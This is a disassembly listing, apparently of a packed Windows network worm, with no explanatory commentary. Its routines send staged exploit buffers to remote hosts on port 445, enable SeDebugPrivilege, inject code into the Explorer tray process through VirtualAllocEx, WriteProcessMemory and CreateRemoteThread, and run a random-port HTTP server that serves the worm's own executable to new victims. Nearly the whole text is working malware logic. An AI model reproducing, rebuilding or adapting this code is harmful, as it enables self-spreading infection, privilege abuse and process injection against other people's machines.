var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31432EC0
mov eax, dword_31434CAC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31434CB0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3143115C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31431F1C
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31431160 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_314310A0 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31434CA0
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31431A2F: ; CODE XREF: sub_314319BC+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31431A2F
push 60h
lea eax, [ebp+var_E4]
push offset dword_314347C0
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31432EB2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31432EAC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31432EB2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31432EA6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31432EA6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31431164 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31431168 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31431F12
mov esi, dword_3143109C
mov edi, 0C8h
push edi
call esi ; dword_3143109C
push ebx
mov ebx, dword_3143116C
push 89h
push offset dword_314345A8
push [ebp+var_4]
call ebx ; dword_3143116C
push edi
call esi ; dword_3143109C
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0A8h
push offset dword_31434634
push [ebp+var_4]
call ebx ; dword_3143116C
push edi
call esi ; dword_3143109C
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0DEh
push offset dword_314346E0
push [ebp+var_4]
call ebx ; dword_3143116C
push edi
call esi ; dword_3143109C
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
cmp eax, 46h
jl loc_31431F07
cmp [ebp+var_730], 31h
jnz loc_31431DB2
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
push offset byte_314342E0
call dword_31431088 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31431088 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31432EB2 ; memcpy
mov eax, dword_31434BE6
add esp, 0Ch
mov [ebp+var_798], eax
loc_31431C53: ; CODE XREF: sub_314319BC+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; dword_3143116C
push edi
call esi ; dword_3143109C
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 68h
push offset dword_31434824
push [ebp+var_4]
call ebx ; dword_3143116C
push edi
call esi ; dword_3143109C
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0A0h
push offset dword_31434890
push [ebp+var_4]
call ebx ; dword_3143116C
push edi
call esi ; dword_3143109C
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
cmp [ebp+arg_0], 0
jz loc_31431EA2
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31434A48
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31432EB2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31434AB4
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31432EB2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31434B28
push eax
call sub_31432EB2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; dword_3143116C
push edi
call esi ; dword_3143109C
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31431EFA
; ---------------------------------------------------------------------------
loc_31431DB2: ; CODE XREF: sub_314319BC+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31432EA6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31434C20
push eax
call sub_31432EB2 ; memcpy
push offset byte_314342E0
call sub_31432EAC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31434C98
push eax
call sub_31432EB2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31434C20
push eax
call sub_31432EB2 ; memcpy
add esp, 40h
push offset byte_314342E0
call sub_31432EAC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31431E4E: ; CODE XREF: sub_314319BC+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31431E4E
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31432EA6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31432EA6 ; memset
add esp, 18h
jmp loc_31431C53
; ---------------------------------------------------------------------------
loc_31431EA2: ; CODE XREF: sub_314319BC+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31434934
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31432EB2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_314349B4
push eax
call sub_31432EB2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31431EFA: ; CODE XREF: sub_314319BC+3F1�j
push eax
push [ebp+var_4]
call ebx ; dword_3143116C
push edi
call esi ; dword_3143109C
and [ebp+var_C], 0
loc_31431F07: ; CODE XREF: sub_314319BC+1AD�j
; sub_314319BC+1E1�j ...
push 2
push [ebp+var_4]
call dword_31431174 ; shutdown
loc_31431F12: ; CODE XREF: sub_314319BC+166�j
push [ebp+var_4]
call dword_31431178 ; closesocket
pop esi
loc_31431F1C: ; CODE XREF: sub_314319BC+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_314319BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431F23 proc near ; CODE XREF: UPX0:loc_31432531�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314310AC ; LoadLibraryA
mov esi, dword_314310A8
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; dword_314310A8
test eax, eax
mov [ebp+var_4], eax
jz short loc_31431FA7
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; dword_314310A8
test eax, eax
mov [ebp+var_8], eax
jz short loc_31431FA7
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; dword_314310A8
mov esi, eax
test esi, esi
jz short loc_31431FA7
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314310A4 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31431FA7: ; CODE XREF: sub_31431F23+28�j
; sub_31431F23+37�j ...
pop edi
pop esi
leave
retn
sub_31431F23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431FAB proc near ; CODE XREF: UPX0:31432545�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31435040
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314310B8 ; GetModuleHandleA
mov esi, dword_314310A8
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; dword_314310A8
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31431FF2
loc_31431FEE: ; CODE XREF: sub_31431FAB+54�j
push 1
jmp short loc_31432043
; ---------------------------------------------------------------------------
loc_31431FF2: ; CODE XREF: sub_31431FAB+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; dword_314310A8
test eax, eax
mov [ebp+var_14], eax
jz short loc_31431FEE
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31431114 ; FindWindowA
test eax, eax
jnz short loc_31432020
call dword_31431118 ; GetForegroundWindow
test eax, eax
jnz short loc_31432020
push 2
jmp short loc_31432043
; ---------------------------------------------------------------------------
loc_31432020: ; CODE XREF: sub_31431FAB+65�j
; sub_31431FAB+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_3143111C ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314310B4 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31432046
push 3
loc_31432043: ; CODE XREF: sub_31431FAB+45�j
; sub_31431FAB+73�j
pop eax
jmp short loc_314320B1
; ---------------------------------------------------------------------------
loc_31432046: ; CODE XREF: sub_31431FAB+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_31431080
test eax, eax
jz short loc_314320A4
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314310B0 ; WriteProcessMemory
push dword_31435034
call esi ; dword_31431080
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31432090
push eax
call esi ; dword_31431080
jmp short loc_314320AB
; ---------------------------------------------------------------------------
loc_31432090: ; CODE XREF: sub_31431FAB+DE�j
push offset aUterm192 ; "uterm19-2"
call sub_314320E4
pop ecx
mov [ebp+var_4], 5
jmp short loc_314320AB
; ---------------------------------------------------------------------------
loc_314320A4: ; CODE XREF: sub_31431FAB+B2�j
mov [ebp+var_4], 4
loc_314320AB: ; CODE XREF: sub_31431FAB+E3�j
; sub_31431FAB+F7�j
push ebx
call esi ; dword_31431080
mov eax, [ebp+var_4]
loc_314320B1: ; CODE XREF: sub_31431FAB+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31431FAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314320B6 proc near ; CODE XREF: sub_3143237F+B�p
; UPX0:31432507�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314310BC ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314310EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_314320B6 endp
; =============== S U B R O U T I N E =======================================
sub_314320E4 proc near ; CODE XREF: sub_31431FAB+EA�p
; UPX0:31432511�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314310C0 ; CreateMutexA
retn
sub_314320E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314320F3 proc near ; CODE XREF: sub_3143256D+163�p
; sub_3143256D+16E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314310C4 ; CreateThread
pop ebp
retn
sub_314320F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143210D proc near ; CODE XREF: sub_3143237F+12C�p
; sub_3143278A+59�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314310C4 ; CreateThread
push eax
call dword_31431080 ; CloseHandle
pop ebp
retn
sub_3143210D endp
; =============== S U B R O U T I N E =======================================
sub_3143212E proc near ; CODE XREF: sub_314311A0+68�p
; sub_31432C62+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31432156
loc_3143213F: ; CODE XREF: sub_3143212E+26�j
call dword_314310FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_3143213F
loc_31432156: ; CODE XREF: sub_3143212E+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_3143212E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143215E proc near ; CODE XREF: sub_314311A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31432EA6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314310C8 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_31431080
mov edi, eax
call esi ; dword_31431080
push [ebp+var_10]
call esi ; dword_31431080
mov eax, edi
pop edi
pop esi
leave
retn
sub_3143215E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314321B4 proc near ; CODE XREF: sub_31432810+3E�p
; sub_314328D7+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_31431150 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_314321D5
call dword_31431154 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_314321D5: ; CODE XREF: sub_314321B4+15�j
lea eax, [ebp+var_34]
push eax
call dword_31431158 ; gethostbyname
test eax, eax
jnz short loc_314321EA
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_314321EA: ; CODE XREF: sub_314321B4+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_314321B4 endp
; =============== S U B R O U T I N E =======================================
sub_314321F3 proc near ; CODE XREF: sub_3143185D+12�p
; sub_31432728+21�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31431134 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_314321F3 endp
; =============== S U B R O U T I N E =======================================
sub_31432209 proc near ; CODE XREF: sub_3143256D+F4�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314310D0 ; OpenEventA
test eax, eax
jz short locret_31432222
push eax
call dword_314310CC ; SetEvent
locret_31432222: ; CODE XREF: sub_31432209+10�j
retn
sub_31432209 endp
; =============== S U B R O U T I N E =======================================
sub_31432223 proc near ; CODE XREF: sub_3143185D+68�p
push esi
mov esi, dword_314310FC
push edi
call esi ; dword_314310FC
mov edi, eax
shl edi, 10h
call esi ; dword_314310FC
or eax, edi
pop edi
pop esi
retn
sub_31432223 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432239 proc near ; DATA XREF: sub_3143237F+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_3143226A
push 1
jmp loc_31432325
; ---------------------------------------------------------------------------
loc_3143226A: ; CODE XREF: sub_31432239+28�j
mov esi, dword_31431104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; dword_31431104
pop ecx
test eax, eax
pop ecx
jz loc_31432335
lea eax, [ebp+var_100]
push offset dword_314341F0
push eax
call esi ; dword_31431104
pop ecx
test eax, eax
pop ecx
jz loc_31432335
mov esi, dword_3143116C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; dword_3143116C
push dword_31435030
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31432EAC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; dword_3143116C
loc_314322E7: ; CODE XREF: sub_31432239+E8�j
mov eax, dword_31435030
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_314322F9
mov eax, ecx
loc_314322F9: ; CODE XREF: sub_31432239+BC�j
test eax, eax
jz short loc_31432328
push 0
push eax
mov eax, dword_31435028
add eax, edi
push eax
push ebx
call esi ; dword_3143116C
cmp eax, 0FFFFFFFFh
jz short loc_31432323
cmp eax, 1000h
jb short loc_31432328
push 64h
add edi, eax
call dword_3143109C ; Sleep
jmp short loc_314322E7
; ---------------------------------------------------------------------------
loc_31432323: ; CODE XREF: sub_31432239+D5�j
push 2
loc_31432325: ; CODE XREF: sub_31432239+2C�j
pop eax
jmp short loc_31432378
; ---------------------------------------------------------------------------
loc_31432328: ; CODE XREF: sub_31432239+C2�j
; sub_31432239+DC�j
push offset dword_3143502C
call dword_314310D8 ; InterlockedIncrement
jmp short loc_31432353
; ---------------------------------------------------------------------------
loc_31432335: ; CODE XREF: sub_31432239+49�j
; sub_31432239+61�j
mov esi, dword_3143116C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; dword_3143116C
push 0
push 3
push offset dword_31434D64
push ebx
call esi ; dword_3143116C
loc_31432353: ; CODE XREF: sub_31432239+FA�j
push 7D0h
call dword_3143109C ; Sleep
push 2
push ebx
call dword_31431174 ; shutdown
push ebx
call dword_31431178 ; closesocket
push 0
call dword_314310D4 ; ExitThread
xor eax, eax
loc_31432378: ; CODE XREF: sub_31432239+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31432239 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143237F proc near ; DATA XREF: sub_3143256D+15E�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_314320B6
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_3143502C, ebx
call sub_31432A49
add esp, 14h
test eax, eax
jnz loc_314324B4
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31431084 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_314323EB
push 1
call dword_314310D4 ; ExitThread
loc_314323EB: ; CODE XREF: sub_3143237F+62�j
push ebx
push esi
call dword_314310E0 ; GetFileSize
push eax
mov dword_31435030, eax
call sub_31432E6C
pop ecx
mov dword_31435028, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31435030
push eax
push esi
call dword_314310DC ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31435030, eax
call dword_31431080 ; CloseHandle
push ebx
push 1
push 2
call dword_3143115C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_3143244D: ; CODE XREF: sub_3143237F+E5�j
; sub_3143237F+ED�j ...
call dword_314310FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_3143503C, eax
jz short loc_3143244D
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_3143244D
push eax
call dword_31431164 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31431144 ; bind
test eax, eax
jnz short loc_3143244D
push 64h
push edi
call dword_31431148 ; listen
mov [ebp+var_8], esi
pop esi
loc_31432496: ; CODE XREF: sub_3143237F+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_3143114C ; accept
push eax
push offset sub_31432239
call sub_3143210D
pop ecx
pop ecx
jmp short loc_31432496
; ---------------------------------------------------------------------------
loc_314324B4: ; CODE XREF: sub_3143237F+3D�j
push ebx
call dword_314310D4 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_3143237F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314324C3 proc near ; CODE XREF: sub_3143256D:loc_314326C5�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_31431140
push eax
push 2
call esi ; dword_31431140
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; dword_31431140
pop esi
leave
retn
sub_314324C3 endp
; ---------------------------------------------------------------------------
loc_314324EF: ; CODE XREF: UPX1:31437DD8�j
push 0
call dword_314310B8 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31435040, eax
call dword_31431074 ; DeleteFileA
call sub_314320B6
push offset aUterm20 ; "uterm20"
call sub_314320E4
pop ecx
mov dword_31435034, eax
call dword_31431078 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31432531
push 1
call dword_314310E4 ; ExitProcess
loc_31432531: ; CODE XREF: UPX0:31432527�j
call sub_31431F23
call sub_31432BAD
call sub_31432D2E
push offset sub_3143256D
call sub_31431FAB
test eax, eax
pop ecx
jz short loc_31432556
push 0
call sub_3143256D
loc_31432556: ; CODE XREF: UPX0:3143254D�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31432559 proc near ; CODE XREF: sub_3143256D:loc_314326EE�p
; sub_31432728:loc_31432740�p ...
push 0
push dword_31435038
call dword_31431070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31432559 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143256D proc near ; CODE XREF: UPX0:31432551�p
; DATA XREF: UPX0:31432540�o
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31431190
push offset loc_31432EA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 6Ch
push ebx
push esi
push edi
mov [ebp+var_78], offset aU10x ; "u10x"
mov [ebp+var_74], offset aU11x ; "u11x"
mov [ebp+var_70], offset aU12x ; "u12x"
mov [ebp+var_6C], offset aU13x ; "u13x"
mov [ebp+var_68], offset aU14x ; "u14x"
mov [ebp+var_64], offset aU15x ; "u15x"
mov [ebp+var_60], offset aU16x ; "u16x"
mov [ebp+var_5C], offset aU17x ; "u17x"
mov [ebp+var_58], offset aU18x ; "u18x"
mov [ebp+var_54], offset aU19x ; "u19x"
mov [ebp+var_50], offset aU8 ; "u8"
mov [ebp+var_4C], offset aU9 ; "u9"
mov [ebp+var_48], offset aU10 ; "u10"
mov [ebp+var_44], offset aU11 ; "u11"
mov [ebp+var_40], offset aU12 ; "u12"
mov [ebp+var_3C], offset aU13 ; "u13"
mov [ebp+var_38], offset aU13i ; "u13i"
mov [ebp+var_34], offset aU14 ; "u14"
mov [ebp+var_30], offset aU15 ; "u15"
mov [ebp+var_2C], offset aU16 ; "u16"
mov [ebp+var_28], offset aU17 ; "u17"
mov [ebp+var_24], offset aU18 ; "u18"
mov [ebp+var_20], offset aU19 ; "u19"
mov [ebp+var_1C], offset aU20 ; "u20"
push offset aU20x ; "u20x"
xor edi, edi
push edi
push 1
push edi
call dword_3143106C ; CreateEventA
mov dword_31435038, eax
mov [ebp+var_4], edi
mov [ebp+var_7C], edi
loc_31432654: ; CODE XREF: sub_3143256D+FD�j
cmp [ebp+var_7C], 0Ah
jnb short loc_3143266C
mov eax, [ebp+var_7C]
push [ebp+eax*4+var_78]
call sub_31432209
pop ecx
inc [ebp+var_7C]
jmp short loc_31432654
; ---------------------------------------------------------------------------
loc_3143266C: ; CODE XREF: sub_3143256D+EB�j
mov [ebp+var_7C], edi
